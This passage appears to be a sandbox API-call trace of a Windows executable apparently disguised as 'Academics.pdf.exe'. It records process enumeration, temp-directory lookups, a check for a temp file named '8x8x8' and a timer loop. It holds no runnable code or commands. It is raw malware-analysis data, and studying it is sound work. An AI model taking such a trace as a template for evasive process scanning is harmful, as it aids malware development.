th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0311.723] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x898, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0311.723] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0311.724] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x90c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0311.725] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="Academics.pdf.exe")) returned 1 [0311.726] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0311.726] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 0 [0311.727] CloseHandle (hObject=0x294) returned 1 [0311.727] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0311.727] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0311.727] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0311.727] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0311.727] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d6e0 [0311.727] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0311.727] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d6e0 | out: hHeap=0x25c0000) returned 1 [0311.727] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0311.727] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0311.727] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0311.727] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0311.727] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0311.727] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0311.728] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0311.728] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x294 [0311.730] Process32FirstW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0311.730] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0311.731] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0311.732] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0311.733] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0311.734] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0311.734] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0311.735] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0311.736] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0311.737] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0311.738] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0311.739] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0311.739] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0311.740] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0311.741] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0311.755] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0311.755] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d6e0 | out: hHeap=0x25c0000) returned 1 [0311.755] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0311.755] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0311.755] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0311.755] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0311.755] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0311.755] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0311.755] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0311.755] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0311.756] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0311.756] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0311.756] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0311.756] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0311.756] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0311.756] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0311.756] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0311.756] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0311.756] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0311.756] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0311.756] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa850 [0311.756] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0311.756] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa9d0 [0311.756] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0311.756] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x24207f0 [0311.756] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2bb8 [0311.756] CharUpperBuffW (in: lpsz="tempdir", cchLength=0x7 | out: lpsz="TEMPDIR") returned 0x7 [0311.756] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab20 [0311.756] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0311.757] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aaaa8 [0311.757] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa18 [0311.757] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab20 | out: hHeap=0x25c0000) returned 1 [0311.757] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aab20 [0311.757] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2dd8 [0311.757] GetTempPathW (in: nBufferLength=0x104, lpBuffer=0x8bf2a0 | out: lpBuffer="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\") returned 0x25 [0311.757] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0311.757] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x50) returned 0x240a4d0 [0311.757] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1468 [0311.757] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0311.757] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0311.757] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0311.757] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0311.757] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0311.757] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab20 | out: hHeap=0x25c0000) returned 1 [0311.757] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0311.757] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9d0 | out: hHeap=0x25c0000) returned 1 [0311.757] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa850 | out: hHeap=0x25c0000) returned 1 [0311.757] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0311.758] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0311.758] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0311.758] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0311.758] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xb0) returned 0x24207f0 [0311.758] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x240a4d0 | out: hHeap=0x25c0000) returned 1 [0311.758] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0311.758] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0311.758] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0311.758] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0311.758] GetFileAttributesW (lpFileName="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp/8x8x8" (normalized: "c:\\users\\5p5nrg~1\\appdata\\local\\temp\\8x8x8")) returned 0x2020 [0311.758] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0311.758] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0311.758] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0311.758] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0311.758] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0311.758] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0311.758] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0311.759] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0311.759] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0311.759] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0311.759] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0311.759] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0311.759] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0311.759] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1758 [0311.759] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa850 [0311.759] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1758 | out: hHeap=0x25c0000) returned 1 [0311.759] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa850 | out: hHeap=0x25c0000) returned 1 [0311.759] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0311.759] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0311.759] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0311.759] timeGetTime () returned 0x4dd43 [0311.759] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0311.759] Sleep (dwMilliseconds=0xa) [0311.766] timeGetTime () returned 0x4dd52 [0311.766] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0311.767] Sleep (dwMilliseconds=0xa) [0311.782] timeGetTime () returned 0x4dd62 [0311.782] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0311.782] Sleep (dwMilliseconds=0xa) [0311.799] timeGetTime () returned 0x4dd71 [0311.799] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0311.799] Sleep (dwMilliseconds=0xa) [0311.813] timeGetTime () returned 0x4dd81 [0311.813] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0311.813] Sleep (dwMilliseconds=0xa) [0311.829] timeGetTime () returned 0x4dd91 [0311.829] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0311.829] Sleep (dwMilliseconds=0xa) [0311.844] timeGetTime () returned 0x4dda0 [0311.844] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0311.844] Sleep (dwMilliseconds=0xa) [0311.860] timeGetTime () returned 0x4ddb0 [0311.860] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0311.860] Sleep (dwMilliseconds=0xa) [0311.876] timeGetTime () returned 0x4ddbf [0311.876] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0311.876] Sleep (dwMilliseconds=0xa) [0311.891] timeGetTime () returned 0x4ddcf [0311.891] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0311.891] Sleep (dwMilliseconds=0xa) [0311.907] timeGetTime () returned 0x4dddf [0311.907] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0311.907] Sleep (dwMilliseconds=0xa) [0311.922] timeGetTime () returned 0x4ddee [0311.922] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0311.922] Sleep (dwMilliseconds=0xa) [0311.938] timeGetTime () returned 0x4ddfe [0311.938] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0311.938] Sleep (dwMilliseconds=0xa) [0311.953] timeGetTime () returned 0x4de0d [0311.954] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0311.954] Sleep (dwMilliseconds=0xa) [0311.973] timeGetTime () returned 0x4de1d [0311.973] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0311.973] Sleep (dwMilliseconds=0xa) [0311.985] timeGetTime () returned 0x4de2d [0311.985] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0311.985] Sleep (dwMilliseconds=0xa) [0312.000] timeGetTime () returned 0x4de3c [0312.000] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0312.000] Sleep (dwMilliseconds=0xa) [0312.020] timeGetTime () returned 0x4de4c [0312.020] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0312.020] Sleep (dwMilliseconds=0xa) [0312.032] timeGetTime () returned 0x4de5b [0312.032] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0312.032] Sleep (dwMilliseconds=0xa) [0312.047] timeGetTime () returned 0x4de6b [0312.047] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0312.047] Sleep (dwMilliseconds=0xa) [0312.063] timeGetTime () returned 0x4de7b [0312.063] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0312.063] Sleep (dwMilliseconds=0xa) [0312.078] timeGetTime () returned 0x4de8a [0312.078] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0312.078] Sleep (dwMilliseconds=0xa) [0312.094] timeGetTime () returned 0x4de9a [0312.094] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0312.094] Sleep (dwMilliseconds=0xa) [0312.110] timeGetTime () returned 0x4dea9 [0312.110] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0312.110] Sleep (dwMilliseconds=0xa) [0312.125] timeGetTime () returned 0x4deb9 [0312.125] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0312.125] Sleep (dwMilliseconds=0xa) [0312.141] timeGetTime () returned 0x4dec9 [0312.141] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0312.141] Sleep (dwMilliseconds=0xa) [0312.156] timeGetTime () returned 0x4ded8 [0312.156] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0312.156] Sleep (dwMilliseconds=0xa) [0312.172] timeGetTime () returned 0x4dee8 [0312.172] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0312.172] Sleep (dwMilliseconds=0xa) [0312.188] timeGetTime () returned 0x4def7 [0312.188] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0312.188] Sleep (dwMilliseconds=0xa) [0312.206] timeGetTime () returned 0x4df07 [0312.206] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0312.206] Sleep (dwMilliseconds=0xa) [0312.219] timeGetTime () returned 0x4df17 [0312.219] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0312.219] Sleep (dwMilliseconds=0xa) [0312.235] timeGetTime () returned 0x4df26 [0312.235] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 0 [0312.235] Sleep (dwMilliseconds=0xa) [0312.250] timeGetTime () returned 0x4df36 [0312.250] PeekMessageW (in: lpMsg=0x8bf7a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf7a0) returned 1 [0312.250] TranslateMessage (lpMsg=0x8bf7a0) returned 0 [0312.250] DispatchMessageW (lpMsg=0x8bf7a0) returned 0x0 [0312.250] KillTimer 